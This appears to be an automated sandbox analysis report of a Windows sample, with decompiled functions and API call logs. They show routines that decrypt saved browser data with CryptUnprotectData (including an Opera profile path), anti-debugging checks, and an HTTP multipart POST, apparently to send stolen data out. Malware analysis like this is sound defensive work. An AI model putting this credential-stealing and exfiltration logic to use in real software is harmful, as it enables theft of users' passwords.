                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cf2b
                                                                                0x0041cf2b
                                                                                0x0041cf2b
                                                                                0x0041cf2d
                                                                                0x0041cf2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cf31
                                                                                0x0041cf36
                                                                                0x0041cf36
                                                                                0x0041cf37
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cf37
                                                                                0x00000000
                                                                                0x0041cf2b
                                                                                0x0041ceff
                                                                                0x0041cf01
                                                                                0x0041cf06
                                                                                0x00000000
                                                                                0x0041cf06
                                                                                0x0041ced5
                                                                                0x0041ced7
                                                                                0x00000000
                                                                                0x0041ced7
                                                                                0x0041cdaa
                                                                                0x0041cd02
                                                                                0x0041cd02
                                                                                0x0041cd03
                                                                                0x0041cd03
                                                                                0x0041cd06
                                                                                0x0041cd07
                                                                                0x0041cd07
                                                                                0x0041cd10
                                                                                0x0041cd12
                                                                                0x0041cd12
                                                                                0x0041cd12
                                                                                0x00000000
                                                                                0x0041cd12
                                                                                0x0041cc9a
                                                                                0x0041cca0
                                                                                0x00000000
                                                                                0x0041cca0
                                                                                0x0041cc8b
                                                                                0x00000000
                                                                                0x0041cc8b
                                                                                0x0041cc74
                                                                                0x0041cc76
                                                                                0x00000000
                                                                                0x0041cc76
                                                                                0x0041cc51
                                                                                0x0041cc57
                                                                                0x0041cc5c
                                                                                0x0041cc5e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cc5e
                                                                                0x0041cc14
                                                                                0x0041cc1a
                                                                                0x0041cc1d
                                                                                0x0041cc1d
                                                                                0x0041cc1f
                                                                                0x0041cc20
                                                                                0x0041cc20
                                                                                0x0041cc24
                                                                                0x0041cc26
                                                                                0x0041cc2e
                                                                                0x0041cc35
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cbaa
                                                                                0x0041cbaa
                                                                                0x00000000
                                                                                0x0041cbaa
                                                                                0x0041cb9a
                                                                                0x0041cb9a
                                                                                0x0041d197
                                                                                0x0041d1a5
                                                                                0x0041d1a5

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /$UT
                                                                                • API String ID: 0-1626504983
                                                                                • Opcode ID: 76391278201aac92ab84a614280e8b1953d29d50434a293e69dbf5287f7c68dc
                                                                                • Instruction ID: fd8b7bcc005b4055f3cd7298a9f5b56cb4a32a40161bfb45bc6a276b5936a230
                                                                                • Opcode Fuzzy Hash: 76391278201aac92ab84a614280e8b1953d29d50434a293e69dbf5287f7c68dc
                                                                                • Instruction Fuzzy Hash: 630261B1D442688BDF25CF288C803DA7BB1AF55304F1444EAD949AB346D6389EC5CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0042D026(void* __edi, char* __esi) {
                                                                                				short _v8;
                                                                                				void* _t24;
                                                                                
                                                                                				_t24 = __edi;
                                                                                				if(__esi == 0 ||  *__esi == 0 || E00426D80(__esi, ?str?) == 0) {
                                                                                					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
                                                                                						if(_v8 != 0) {
                                                                                							goto L5;
                                                                                						} else {
                                                                                							return GetACP();
                                                                                						}
                                                                                					} else {
                                                                                						goto L8;
                                                                                					}
                                                                                				} else {
                                                                                					if(E00426D80(__esi, ?str?) != 0) {
                                                                                						_v8 = E0041F2DD(__esi);
                                                                                						goto L5;
                                                                                					} else {
                                                                                						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
                                                                                							L8:
                                                                                							return 0;
                                                                                						} else {
                                                                                							L5:
                                                                                							return _v8;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}





                                                                                0x0042d026
                                                                                0x0042d02e
                                                                                0x0042d096
                                                                                0x0042d0a0
                                                                                0x00000000
                                                                                0x0042d0a2
                                                                                0x0042d0a9
                                                                                0x0042d0a9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042d046
                                                                                0x0042d055
                                                                                0x0042d07b
                                                                                0x00000000
                                                                                0x0042d057
                                                                                0x0042d06d
                                                                                0x0042d098
                                                                                0x0042d09b
                                                                                0x0042d06f
                                                                                0x0042d06f
                                                                                0x0042d073
                                                                                0x0042d073
                                                                                0x0042d06d
                                                                                0x0042d055

                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0042D663,?,00422072,?,000000BC,?,00000001,00000000,00000000), ref: 0042D065
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0042D663,?,00422072,?,000000BC,?,00000001,00000000,00000000), ref: 0042D08E
                                                                                • GetACP.KERNEL32(?,?,0042D663,?,00422072,?,000000BC,?,00000001,00000000), ref: 0042D0A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 2285dc8713adbe3c9d406ae614dc47d018e5268425dee8397a194ab756531158
                                                                                • Instruction ID: 7f6fb99b993c7ba38f18b7e83791968bfbbbb52a9b2ffcd3d875bc124439c8cf
                                                                                • Opcode Fuzzy Hash: 2285dc8713adbe3c9d406ae614dc47d018e5268425dee8397a194ab756531158
                                                                                • Instruction Fuzzy Hash: 6301D430B0026ABAEB219B71BC05F9F77A8AF0571CFA0016AF141E11E0DB78DA43865D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0041DEB4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                				intOrPtr _v0;
                                                                                				void* _v804;
                                                                                				intOrPtr _v808;
                                                                                				intOrPtr _v812;
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t13;
                                                                                				long _t17;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr* _t31;
                                                                                				void* _t34;
                                                                                
                                                                                				_t27 = __esi;
                                                                                				_t26 = __edi;
                                                                                				_t25 = __edx;
                                                                                				_t22 = __ecx;
                                                                                				_t21 = __ebx;
                                                                                				_t6 = __eax;
                                                                                				_t34 = _t22 -  *0x447674; // 0x4124c941
                                                                                				if(_t34 == 0) {
                                                                                					asm("repe ret");
                                                                                				}
                                                                                				 *0x448f08 = _t6;
                                                                                				 *0x448f04 = _t22;
                                                                                				 *0x448f00 = _t25;
                                                                                				 *0x448efc = _t21;
                                                                                				 *0x448ef8 = _t27;
                                                                                				 *0x448ef4 = _t26;
                                                                                				 *0x448f20 = ss;
                                                                                				 *0x448f14 = cs;
                                                                                				 *0x448ef0 = ds;
                                                                                				 *0x448eec = es;
                                                                                				 *0x448ee8 = fs;
                                                                                				 *0x448ee4 = gs;
                                                                                				asm("pushfd");
                                                                                				_pop( *0x448f18);
                                                                                				 *0x448f0c =  *_t31;
                                                                                				 *0x448f10 = _v0;
                                                                                				 *0x448f1c =  &_a4;
                                                                                				 *0x448e58 = 0x10001;
                                                                                				_t11 =  *0x448f10; // 0x0
                                                                                				 *0x448e0c = _t11;
                                                                                				 *0x448e00 = 0xc0000409;
                                                                                				 *0x448e04 = 1;
                                                                                				_t12 =  *0x447674; // 0x4124c941
                                                                                				_v812 = _t12;
                                                                                				_t13 =  *0x447678; // 0xbedb36be
                                                                                				_v808 = _t13;
                                                                                				 *0x448e50 = IsDebuggerPresent();
                                                                                				_push(1);
                                                                                				E0042F2C5(_t14);
                                                                                				SetUnhandledExceptionFilter(0);
                                                                                				_t17 = UnhandledExceptionFilter(0x438e50);
                                                                                				if( *0x448e50 == 0) {
                                                                                					_push(1);
                                                                                					E0042F2C5(_t17);
                                                                                				}
                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                			}



















                                                                                0x0041deb4
                                                                                0x0041deb4
                                                                                0x0041deb4
                                                                                0x0041deb4
                                                                                0x0041deb4
                                                                                0x0041deb4
                                                                                0x0041deb4
                                                                                0x0041deba
                                                                                0x0041debc
                                                                                0x0041debc
                                                                                0x00423fe7
                                                                                0x00423fec
                                                                                0x00423ff2
                                                                                0x00423ff8
                                                                                0x00423ffe
                                                                                0x00424004
                                                                                0x0042400a
                                                                                0x00424011
                                                                                0x00424018
                                                                                0x0042401f
                                                                                0x00424026
                                                                                0x0042402d
                                                                                0x00424034
                                                                                0x00424035
                                                                                0x0042403e
                                                                                0x00424046
                                                                                0x0042404e
                                                                                0x00424059
                                                                                0x00424063
                                                                                0x00424068
                                                                                0x0042406d
                                                                                0x00424077
                                                                                0x00424081
                                                                                0x00424086
                                                                                0x0042408c
                                                                                0x00424091
                                                                                0x0042409d
                                                                                0x004240a2
                                                                                0x004240a4
                                                                                0x004240ac
                                                                                0x004240b7
                                                                                0x004240c4
                                                                                0x004240c6
                                                                                0x004240c8
                                                                                0x004240cd
                                                                                0x004240e1

                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00424097
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004240AC
                                                                                • UnhandledExceptionFilter.KERNEL32(00438E50), ref: 004240B7
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 004240D3
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004240DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID:
                                                                                • API String ID: 2579439406-0
                                                                                • Opcode ID: d1227ddd02e44f727ab6bfe88f683d217f684dd8178b6e176109bea82ce3b7e9
                                                                                • Instruction ID: 42523199e0496858c6f3ef741f8fe1b6c3c72ff08fbcea3be4b5edc50b7c5d92
                                                                                • Opcode Fuzzy Hash: d1227ddd02e44f727ab6bfe88f683d217f684dd8178b6e176109bea82ce3b7e9
                                                                                • Instruction Fuzzy Hash: 6B21FEBC9003149FD700EF25E9456487BB6BB0A319B60443EEA08C3261EBB4598A8F4D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00C73901
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C73916
                                                                                • UnhandledExceptionFilter.KERNEL32(00C613B4), ref: 00C73921
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00C7393D
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C73944
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID:
                                                                                • API String ID: 2579439406-0
                                                                                • Opcode ID: d11a92ebd5861b26969c0916701d3e81d7b92d08fd63875dbda5e8771e60ed6c
                                                                                • Instruction ID: 78147c9c6b27f15ac8ed897e950b54c265c1373311fdd8c61f7e470ece5d4147
                                                                                • Opcode Fuzzy Hash: d11a92ebd5861b26969c0916701d3e81d7b92d08fd63875dbda5e8771e60ed6c
                                                                                • Instruction Fuzzy Hash: 5F21EFB4800344DFC711DF69FC857883BA2BB4B319F14401AE90AC7B60E7B4A985CF66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E0040F8E3(char __eax, intOrPtr __ecx, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				char _t23;
                                                                                				void* _t24;
                                                                                
                                                                                				_t23 = __eax;
                                                                                				_t21 = __ecx;
                                                                                				E00421230(E0041E042(_t20, __ecx, __eax, __eax), _t21, _t23);
                                                                                				_v8 = _t21;
                                                                                				_v12 = _t23;
                                                                                				_t24 = E0041E042(_t20, _t21, _t23, _t23);
                                                                                				_push( &_v20);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push( &_v12);
                                                                                				if( *0x44a130() == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_t22 = _v20;
                                                                                				if(_t22 > 0) {
                                                                                					E00421230(_t24, _v16, _t22);
                                                                                				}
                                                                                				 *((char*)(_t22 + _t24)) = 0;
                                                                                				return _t24;
                                                                                			}














                                                                                0x0040f8ec
                                                                                0x0040f8ef
                                                                                0x0040f8f9
                                                                                0x0040f8ff
                                                                                0x0040f902
                                                                                0x0040f90d
                                                                                0x0040f914
                                                                                0x0040f915
                                                                                0x0040f916
                                                                                0x0040f917
                                                                                0x0040f918
                                                                                0x0040f919
                                                                                0x0040f91d
                                                                                0x0040f926
                                                                                0x00000000
                                                                                0x0040f943
                                                                                0x0040f928
                                                                                0x0040f92d
                                                                                0x0040f934
                                                                                0x0040f939
                                                                                0x0040f93c
                                                                                0x00000000

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0040F8F1
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • _memmove.LIBCMT ref: 0040F8F9
                                                                                • _malloc.LIBCMT ref: 0040F905
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F91E
                                                                                • _memmove.LIBCMT ref: 0040F934
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
                                                                                • String ID:
                                                                                • API String ID: 2315474888-0
                                                                                • Opcode ID: d312a12141f7c08cd22da458a9e876fde632b35940e82e4f562c6c69d5fb98c2
                                                                                • Instruction ID: 8e12b4296f2748bae1805476724645e43c523f7cbe75c9f35b2020013eb0425e
                                                                                • Opcode Fuzzy Hash: d312a12141f7c08cd22da458a9e876fde632b35940e82e4f562c6c69d5fb98c2
                                                                                • Instruction Fuzzy Hash: FEF0C2B7E00124BBC720AAFA9C45CEFBAAC9DA1754B44047BF400F3242E578D90483B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0040F6A5(intOrPtr __eax, long* __edi, char _a4, void** _a8) {
                                                                                				void* _v8;
                                                                                				long _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				long _t19;
                                                                                				void* _t20;
                                                                                				void* _t22;
                                                                                
                                                                                				_v16 = __eax;
                                                                                				_v20 = _a4;
                                                                                				_t22 =  *0x44a130( &_v20, 0, 0, 0, 0, 0,  &_v12);
                                                                                				if(_t22 != 0) {
                                                                                					_t19 = _v12;
                                                                                					 *__edi = _t19;
                                                                                					_t20 = LocalAlloc(0x40, _t19);
                                                                                					 *_a8 = _t20;
                                                                                					if(_t20 != 0) {
                                                                                						E00421230(_t20, _v8,  *__edi);
                                                                                					}
                                                                                				}
                                                                                				return LocalFree(_v8) & 0xffffff00 | _t22 != 0x00000000;
                                                                                			}










                                                                                0x0040f6ad
                                                                                0x0040f6b3
                                                                                0x0040f6cb
                                                                                0x0040f6cf
                                                                                0x0040f6d1
                                                                                0x0040f6d7
                                                                                0x0040f6d9
                                                                                0x0040f6e2
                                                                                0x0040f6e6
                                                                                0x0040f6ee
                                                                                0x0040f6f3
                                                                                0x0040f6e6
                                                                                0x0040f707

                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F6C5
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F6D9
                                                                                • _memmove.LIBCMT ref: 0040F6EE
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F6F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                                                                • String ID:
                                                                                • API String ID: 3008826695-0
                                                                                • Opcode ID: 0e797b80411f5249b4e92994604441a1934d7bb5cf0faeb169f5518669d1a3ca
                                                                                • Instruction ID: bf2e848067eb5d4dca7efae01f5592b5b6e9b7df25eaf559de0164cda3802c89
                                                                                • Opcode Fuzzy Hash: 0e797b80411f5249b4e92994604441a1934d7bb5cf0faeb169f5518669d1a3ca
                                                                                • Instruction Fuzzy Hash: 5BF04FB5D00228AFCB01AFE4DC8989EBBBDEF08700F104875F901E7251E7769A549F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040F64C(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
                                                                                				int _v8;
                                                                                				BYTE* _t8;
                                                                                				int _t9;
                                                                                
                                                                                				 *__ebx = 0;
                                                                                				_v8 = 0;
                                                                                				 *__edi = 0;
                                                                                				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
                                                                                					_t8 = LocalAlloc(0x40,  *__edi);
                                                                                					 *__ebx = _t8;
                                                                                					if(_t8 != 0) {
                                                                                						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
                                                                                						_v8 = _t9;
                                                                                						if(_t9 == 0) {
                                                                                							 *__ebx = LocalFree( *__ebx);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _v8;
                                                                                			}






                                                                                0x0040f65d
                                                                                0x0040f65f
                                                                                0x0040f662
                                                                                0x0040f66c
                                                                                0x0040f672
                                                                                0x0040f678
                                                                                0x0040f67c
                                                                                0x0040f688
                                                                                0x0040f68e
                                                                                0x0040f693
                                                                                0x0040f69d
                                                                                0x0040f69d
                                                                                0x0040f693
                                                                                0x0040f67c
                                                                                0x0040f6a4

                                                                                APIs
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040F664
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,0040F87A,?,?,00441408,00000000,-0000001D), ref: 0040F672
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040F688
                                                                                • LocalFree.KERNEL32(?,?,?,0040F87A,?,?,00441408,00000000,-0000001D), ref: 0040F697
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 4291131564-0
                                                                                • Opcode ID: d3cde1f4731fd7c0f3ae1c3c28740f5cb1e59c49fb130f287165d4335a15ea45
                                                                                • Instruction ID: 3e65eb0fd80b9b5ae2cb91d2f39911a7dc48803ade655c59b0832b9c5bc50277
                                                                                • Opcode Fuzzy Hash: d3cde1f4731fd7c0f3ae1c3c28740f5cb1e59c49fb130f287165d4335a15ea45
                                                                                • Instruction Fuzzy Hash: 5EF03C70101234BBCB325F22CC4CE8B7FBCEF06BA0B000065F509E6264D7714950DAA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401000(void* __eax, void* __ecx, WCHAR* _a4) {
                                                                                				signed int _v8;
                                                                                				void* _t13;
                                                                                				intOrPtr* _t16;
                                                                                				intOrPtr* _t20;
                                                                                
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				0;
                                                                                				_v8 =  *[fs:0x30];
                                                                                				_t20 =  *((intOrPtr*)(_v8 + 0xc)) + 0x14;
                                                                                				_t16 =  *_t20;
                                                                                				while(_t16 != _t20) {
                                                                                					if(lstrcmpiW( *(_t16 + 0x28), _a4) == 0) {
                                                                                						_t13 = 1;
                                                                                					} else {
                                                                                						_t16 =  *_t16;
                                                                                						continue;
                                                                                					}
                                                                                					L5:
                                                                                					return _t13;
                                                                                				}
                                                                                				_t13 = 0;
                                                                                				goto L5;
                                                                                			}







                                                                                0x00401004
                                                                                0x00401016
                                                                                0x00401019
                                                                                0x00401025
                                                                                0x00401028
                                                                                0x0040103e
                                                                                0x0040103a
                                                                                0x00401048
                                                                                0x0040103c
                                                                                0x0040103c
                                                                                0x00000000
                                                                                0x0040103c
                                                                                0x00401044
                                                                                0x00401047
                                                                                0x00401047
                                                                                0x00401042
                                                                                0x00000000

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 1586166983-0
                                                                                • Opcode ID: e9359936c10f8ac918efdde15a03defa36e9a40a5e2c930e284f521e147bf3fe
                                                                                • Instruction ID: 35dd3cdcdbb2c094024535e1c2f5891a0eb7d1e2b3620cf173f4ee0af18b18b5
                                                                                • Opcode Fuzzy Hash: e9359936c10f8ac918efdde15a03defa36e9a40a5e2c930e284f521e147bf3fe
                                                                                • Instruction Fuzzy Hash: 86F0EC32A00240EBCF20CF18C800BAAFBB8EB43360F213066E404B3650C338ED41EA9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: db4157b6f875e50ad0999775a506b9c38830dca3911d7453a5f1329d5aac1a19
                                                                                • Instruction ID: f65cf7065854efaf78d3b0bad71e21d60e3e4e83c6364bec3b43d1ccc3cb79b8
                                                                                • Opcode Fuzzy Hash: db4157b6f875e50ad0999775a506b9c38830dca3911d7453a5f1329d5aac1a19
                                                                                • Instruction Fuzzy Hash: CFC02B11562B37CC1333267646534CCF98264371700BC0305C3AB050EC53944000AF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040E86D
                                                                                • _memset.LIBCMT ref: 0040E880
                                                                                • _memset.LIBCMT ref: 0040E892
                                                                                • GetProcessHeap.KERNEL32(00000000,00800000,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040E8A0
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040E8A7
                                                                                • _memset.LIBCMT ref: 0040E8B9
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E8C9
                                                                                • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040E8E2
                                                                                • StrCmpCA.SHLWAPI(http://,https://,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040E8FC
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040E92F
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040E94C
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040E95B
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040E96B
                                                                                • lstrcat.KERNEL32(?,00441268), ref: 0040E979
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040E983
                                                                                • lstrcat.KERNEL32(?,Content-Type: multipart/form-data; boundary=----), ref: 0040E995
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040E9A9
                                                                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0040E9C9
                                                                                • HttpOpenRequestA.WININET(?,POST,00440EC8,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 0040EA00
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EA19
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EA2D
